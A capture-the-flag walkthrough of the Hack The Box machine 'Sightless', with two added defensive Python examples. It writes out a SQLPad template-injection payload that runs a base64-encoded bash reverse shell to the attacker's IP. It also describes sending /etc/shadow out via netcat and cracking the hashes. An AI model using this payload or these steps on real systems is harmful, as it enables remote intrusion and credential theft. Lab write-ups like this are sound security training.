HTB: Sightless Walkthrough

Writeup — Sightless by Araiz Naqvi

Overview

- Difficulty: Easy
- Operating System: Linux
- Objective: Understand potential breaking points in the Sightless machine.
- Tools Used: Nmap, SSH, FTP, Burp Suite, Hashcat, John the Ripper, FoxyProxy, nc, Gobuster, curl, FileZilla, keepass2john, kpcli, dos2unix

If you’re unable to view it fully because of Medium’s subscription limits, you can view it at https://araizhacks.blogspot.com/2025/01/htb-cap-walkthrough.html


I tend to start enumerating as much basic information as I need before delving deeper.

Performing Nmap Scans

As usual, the very first step is to figure out what ports, and hence what services, are actually open. This will set the stage for how we will try to break in.
Let’s start with a stealth scan with ARP pings disabled to figure out what ports are open:

It is clear that the following ports are open:
- 21 ~ FTP
- 22 ~ SSH
- 80 ~ HTTP

Now, let’s move further and scan for service versions and run the default scripts on these three ports:

From this I interpreted the following information:
- FTP runs on 21, exposing a ProFTPD server whose hostname is sightless.htb
- SSH runs on 22, exposing that an Ubuntu OS is in use
- HTTP runs on 80, exposing an Nginx server, which confirms the use of Ubuntu and hints at the presence of a webpage.

Let’s move on to grabbing banners to see if something comes up.

Banner Grabbing

Let’s grab some banners; you never know, they sometimes come back with really important information and confirm the service versions in use.

Starting with FTP:

Next, with SSH:

Finally, for HTTP I first tried nc, which did not come back with anything, so I used curl with the -IL flags, where -I fetches only the HTTP headers and -L makes curl follow redirects if the server responds that the page has moved elsewhere.

This confirms all the data from the Nmap scans.
Apart from that, nothing very special.

Gobuster Directory Enumeration

Next up, I did some Gobuster enumeration.
First, I used the wordlist from SecLists called common.txt as:

Secondly, I used another text file called directory-list-lowercase-2.3-small.txt:


At this point, enough basic scanning is complete and I will now move on to browsing to sightless.htb to discover what else catches the eye.

Wappalyzer Information

Let’s finally wrap up with getting a glimpse of what web technologies this webpage is working on:


(Don’t have it? Just search for `wappalyzer <your-browser> plugin` and enable the plugin on the page you wish to scan)

Browsing

Upon initial inspection, the source code is nothing special either.
However, on the website there are two specific buttons of much interest:


The first button leads to SQLPad, which looks like a SQL IDE of sorts, while the second takes you to the Froxlor homepage.

Teasing around SQLPad

And just before we move on, also save this URL in your /etc/hosts, because otherwise it might not open:

Let’s create a new connection using the MySQL driver and just name it TEST-CONNECTION. Before we do anything, let’s start a listener on port 4444 and see whether the target connects back to us:

Now, go to the SQLPad page again and insert your IP (that is, the attacker’s IP) and the port on which nc is listening (find the IP using ifconfig on the TUN interface):

Now, click on Test and go back to our listener.

Bang! We have a connection! This means an SSRF (Server-Side Request Forgery) vulnerability is present.

Now, I’m going to go directly for trying to exploit it.


Searching for Exploits

Let’s go ahead and search for exploits.
First a quick check of the server version:

I then simply searched for “SQLPad 6.10.0 exploit” and hit this NIST page, https://nvd.nist.gov/vuln/detail/CVE-2022-0944, which describes CVE-2022-0944.
It then forwarded me to this page, which was linked from NIST:

It should look something like this at https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb:

Gaining Reverse Shell

Carefully reading the exploit, it says that this is a Template Injection vulnerability, which usually involves database input that is not cross-checked/validated and can lead to RCE.

The next steps are clear:

I first crafted the reverse shell code that needs to be executed:

This I will decode on the target machine and run via bash, which will create the reverse shell.
I just need to do a few things now:
1. Create the rev shell server on my machine
2. Modify the exploit code
3. Upload the code

Let’s first create the server:

Next, let’s create the final exploit code:

Now, go to the SQLPad page on sightless.htb and enter:
- IP — 10.10.14.191
- Database — {{ process.mainModule.require('child_process').exec('echo YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC4xMC4xNC4xOTEvNDQ0NCAwPiYx | base64 -d | bash') }}

And, bingo! You get root access!
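From the defender’s side, the root cause above is that a connection field is handed to a template engine instead of being treated as plain data. The following is an added example of allow-list validation for such fields; it is not SQLPad’s code and is not the fix the project shipped. The field names (`host`, `database`), the character classes allowed for them, and the sample submissions are assumptions made for the example.

```python
import re

# Any {{ ... }} expression: the template syntax abused in the SQLPad payload above.
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}", re.DOTALL)
# Node.js names that have no business in a database name or host field.
NODE_GLOBAL_RE = re.compile(r"\b(process|require|child_process|mainModule)\b")
# Conservative allow-list for a MySQL database name (assumption: letters,
# digits, underscore and dollar only, at most 64 characters).
DB_NAME_RE = re.compile(r"^[A-Za-z0-9_$]{1,64}$")
# Host: hostname or IP literal characters only (assumption).
HOST_RE = re.compile(r"^[A-Za-z0-9.:_-]{1,253}$")


def find_injection(fields):
    """Return (field, reason) pairs for connection fields that look like
    template injection attempts. `fields` is a dict of the submitted
    connection form (field name -> string value)."""
    findings = []
    for name, value in fields.items():
        if not isinstance(value, str):
            continue
        if TEMPLATE_RE.search(value):
            findings.append((name, "template expression"))
        if NODE_GLOBAL_RE.search(value):
            findings.append((name, "node global"))
    return findings


def validate_connection(fields):
    """Allow-list validation: True only when every field is well-formed and
    nothing looks like a template. The allow-list is the actual mitigation;
    the deny-list in find_injection() only exists to produce a clear log line."""
    if find_injection(fields):
        return False
    if not DB_NAME_RE.match(fields.get("database", "")):
        return False
    if not HOST_RE.match(fields.get("host", "")):
        return False
    return True


# Constructed sample submissions (not captured traffic from the box).
BENIGN = {"name": "TEST-CONNECTION", "host": "127.0.0.1",
          "port": "3306", "database": "sightless_db"}
MALICIOUS = {"name": "TEST-CONNECTION", "host": "127.0.0.1",
             "port": "3306",
             "database": "{{ process.mainModule.require('child_process') }}"}

if __name__ == "__main__":
    for label, submission in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, validate_connection(submission), find_injection(submission))
```

The important design point is that rejection is driven by the allow-list: a database name that is not plain identifier characters is refused whether or not it matches any known payload, so a new encoding of the same trick fails the same way. The deny-list match is there so the rejected request can be logged as a probable attack rather than a typo.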


Browsing for Credentials

Once in, it is visible that we are logged in as root.
So, let’s make use of our privileges. I will cat /etc/passwd and /etc/shadow back to my machine.
First, start a listener on my local machine at port 5555 (choose any port you like).
Then,

Now, you should have both of these locally:

Upon closer look at /etc/shadow:

Bingo! We have the hashed passwords of root and michael.
Copy and paste both of these into separate files so we can work towards getting the passwords.
Let’s work on root first:

Now, for michael:

We now have passwords for both:

Let’s quickly login as michael and check for the user flag:

Checking the contents:

There is the user flag.
The same, however, does not work for root, so we’ve got to search for other ways.

Searching for Root Flag

Upon checking for listening ports, there is a service listening on 127.0.0.1:8080.

Now, upon visiting:

Let’s look for some vulnerabilities that affect Froxlor.
You’ll eventually find a page, https://github.com/froxlor/Froxlor/security/advisories/GHSA-x525-54hf-xr53, which has a payload for an XSS vulnerability.

So, according to the CVE, we need to log in with fake creds and then upload the payload.
But first, let’s format the payload a bit.
Go to `burpsuite > decoder`:

Then do some more formatting, i.e. replace ; with new lines and + with .
Also replace the link with /admin_admins.php:

Now, intercept the login in Burp and upload the payload after logging in as:

Now, log in to Froxlor with the credentials:

And… you’re in!

There’s a user called web1; click on the user and change his password.
Copy the credentials so they’re safe with you:

Now, let’s FTP in as web1 with FileZilla, because the normal CLI FTP was not working.
Deep in the backups you will find:

Let’s run keepass2john on it to get its .hash file so that john can work on it:

Now use hashcat with -m 13700 to get the master password, which should be bulldogs.
Now, we’re free to log in:

Let’s find:

Let’s get this id_rsa using the attach command:

Now, coming back to my own machine I see:

There is the id_rsa. Let’s use it to see whether it’s usable or whether something needs to be fixed:

Let’s convert it to UNIX format:

Now, let’s try again:
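The key extracted from the KeePass attachment needed dos2unix because ssh rejects a PEM block whose lines end in CRLF, and it separately refuses a private key whose permissions are wider than 0600. The following is an added example (not from the original post) that performs the same two checks on a key file and applies the same normalisation dos2unix does; the placeholder key body is constructed and is not a real key.

```python
import os
import stat
import tempfile

BEGIN = b"-----BEGIN OPENSSH PRIVATE KEY-----"
END = b"-----END OPENSSH PRIVATE KEY-----"


def to_unix(data: bytes) -> bytes:
    """Same transformation as dos2unix: CRLF (and any stray CR) become LF,
    and the file ends in exactly one LF."""
    text = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    return text.rstrip(b"\n") + b"\n"


def inspect_key(path: str) -> list:
    """Return the reasons ssh would refuse this key file (empty list = fine)."""
    issues = []
    with open(path, "rb") as f:
        data = f.read()
    if b"\r" in data:
        issues.append("crlf line endings")
    if not data.startswith(BEGIN):
        issues.append("missing BEGIN marker")
    if not data.rstrip().endswith(END):
        issues.append("missing END marker")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:  # group or other has any access: ssh refuses the key
        issues.append("permissions too open (%o)" % mode)
    return issues


def fix_key(path: str) -> list:
    """Normalise line endings and permissions in place, then re-inspect."""
    with open(path, "rb") as f:
        data = f.read()
    with open(path, "wb") as f:
        f.write(to_unix(data))
    os.chmod(path, 0o600)
    return inspect_key(path)


# Constructed placeholder key body (not a real key) written with CRLF endings,
# mimicking a file that passed through a Windows host or a KeePass attachment.
SAMPLE_KEY_CRLF = (BEGIN + b"\r\n"
                   + b"AAAAPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER\r\n"
                   + b"PLACEHOLDERPLACEHOLDER==\r\n"
                   + END + b"\r\n")


def demo():
    """Write the sample with loose permissions, inspect, fix, inspect again."""
    fd, path = tempfile.mkstemp(prefix="id_rsa_")
    with os.fdopen(fd, "wb") as f:
        f.write(SAMPLE_KEY_CRLF)
    os.chmod(path, 0o644)
    try:
        return inspect_key(path), fix_key(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
```

Running the block prints the two findings on the CRLF copy and an empty list after the fix; on a real file you would call `inspect_key("id_rsa")` first so you know which of the two problems ssh’s terse error actually refers to.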

There is your root flag!


Prepared by Araiz Naqvi
